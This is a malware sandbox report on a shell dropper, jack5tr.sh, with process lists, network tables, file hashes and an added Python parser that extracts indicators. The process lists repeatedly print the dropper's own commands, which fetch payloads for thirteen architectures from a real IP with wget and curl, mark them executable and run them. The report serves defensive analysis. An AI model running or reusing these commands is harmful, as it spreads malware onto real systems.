| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:37
Platform
debian12-mipsel-20240221-en
Max time kernel
56s
Max time network
94s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/usr/bin/cat
[cat x86]
/usr/bin/chmod
[chmod +x jack5tr.sh RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x jack5tr.sh mips RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/usr/bin/cat
[cat arc]
/usr/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/usr/bin/cat
[cat mpsl]
/usr/bin/chmod
[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/usr/bin/cat
[cat ppc]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/usr/bin/cat
[cat m68k]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-5 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-5 | udp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-5 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-5 | udp |
Files
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:36
Platform
debian9-armhf-20240729-en
Max time kernel
14s
Max time network
16s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target | Count |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A | 13 |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A | 13 |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/wget
[wget http://193.37.59.116/x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x jack5tr.sh RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mips]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x jack5tr.sh mips RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arc]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/bin/cat
[cat arc]
/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/x86_64]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mpsl]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm5]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm6]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm7]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/ppc]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/spc]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/m68k]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/sh4]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto | Count |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp | 26 |
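The process list and the network table above describe the whole dropper. For each of thirteen architecture names the script fetches http://193.37.59.116/<arch> with wget and again with curl -O (26 connections to 193.37.59.116:80, two per payload), runs cat on the download, runs chmod +x on everything in /tmp, and executes ./RUN; the "Writes file to tmp directory" table attributes /tmp/RUN to /tmp/jack5tr.sh, consistent with cat's output being redirected into RUN. It does this on an armhf box for all thirteen payloads, so nothing in the script checks which CPU the host actually has. Two things matter when lifting indicators from this page: the chmod argument lists contain the sandbox's own systemd-private-* directory, which is collateral from a wildcard chmod and not an indicator, and the "Checks CPU configuration" and "Reads runtime system information" signatures are attributed to /usr/bin/curl, that is, to the stock download tool's library start-up (cpuinfo and auxv CPU-feature probing, the OpenSSL fips_enabled check), not to the payloads. The parser below is an added example, not part of the report or of jack5tr.sh: it reconstructs the loop from the report's two-line process format and separates real indicators from that collateral. Its embedded input is the first three iterations copied from the list above; the full list parses the same way.

```python
"""Rebuild the dropper's per-architecture loop from the sandbox process list.

Added example, not part of the sandbox report or of jack5tr.sh itself: it
parses the "/image" + "[cmdline]" pairs in the Processes section and checks
that every architecture goes through the same wget -> curl -> cat -> chmod ->
./RUN cycle, pulling out the indicators worth keeping (payload host, URLs,
payload names) and separating them from sandbox collateral.
"""
from dataclasses import dataclass, field
from urllib.parse import urlparse

# First three of the thirteen iterations, copied from the behavioral3 process
# list; the parser treats the full list identically.
PROCESS_LIST = """\
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/wget
[wget http://193.37.59.116/x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x jack5tr.sh RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mips]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x jack5tr.sh mips RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arc]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/bin/cat
[cat arc]
/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86]
/tmp/RUN
[./RUN]
"""

STAGE_ORDER = ["wget", "curl", "cat", "chmod", "RUN"]
# Files the script itself creates; anything else chmod touched came from "chmod +x *".
STAGING_FILES = {"jack5tr.sh", "RUN"}


def parse_processes(text):
    """Return (image, argv) pairs from the report's two-line-per-process format."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 2:
        raise ValueError("process list must alternate image and [cmdline] lines")
    procs = []
    for image, cmd in zip(lines[0::2], lines[1::2]):
        if not (cmd.startswith("[") and cmd.endswith("]")):
            raise ValueError(f"expected [cmdline] after {image}, got {cmd!r}")
        procs.append((image, cmd[1:-1].split()))
    return procs


@dataclass
class Iteration:
    arch: str
    urls: list = field(default_factory=list)
    stages: list = field(default_factory=list)
    chmod_targets: list = field(default_factory=list)


def reconstruct(procs):
    """Group the flat process list into one Iteration per downloaded payload."""
    iterations, cur = [], None
    for image, argv in procs:
        tool = argv[0].rsplit("/", 1)[-1]
        if tool == "wget":                      # each cycle opens with wget
            cur = Iteration(arch=argv[-1].rsplit("/", 1)[-1])
            iterations.append(cur)
        if cur is None:                         # the parent shell, before the loop
            continue
        if tool in ("wget", "curl"):
            cur.urls.append(argv[-1])
            cur.stages.append(tool)
        elif tool == "cat":
            cur.stages.append("cat")
        elif tool == "chmod":
            cur.chmod_targets = [a for a in argv[1:] if not a.startswith(("+", "-"))]
            cur.stages.append("chmod")
        elif image == "/tmp/RUN":
            cur.stages.append("RUN")
    return iterations


def summarize(iterations):
    payloads = {it.arch for it in iterations}
    collateral = set()
    for it in iterations:
        collateral |= set(it.chmod_targets) - payloads - STAGING_FILES
    return {
        "hosts": {urlparse(u).hostname for it in iterations for u in it.urls},
        "payload_order": [it.arch for it in iterations],
        # one wget plus one curl per payload: the row count the Network table should show
        "fetch_attempts": sum(len(it.urls) for it in iterations),
        "uniform_loop": all(it.stages == STAGE_ORDER for it in iterations),
        "collateral_chmod": collateral,
    }


SUMMARY = summarize(reconstruct(parse_processes(PROCESS_LIST)))

if __name__ == "__main__":
    for key, value in SUMMARY.items():
        print(f"{key}: {value}")
```

Run against the full thirteen-iteration list, `fetch_attempts` comes out at 26, matching the network table, and `collateral_chmod` contains only the systemd-private-* name, which is the one string in the chmod lines that should not go into a blocklist.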
Files
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/RUN
| MD5 | 9c1344aa17dc266ff8f8637b2becfc46 |
| SHA1 | 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee |
| SHA256 | 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4 |
| SHA512 | 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1 |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
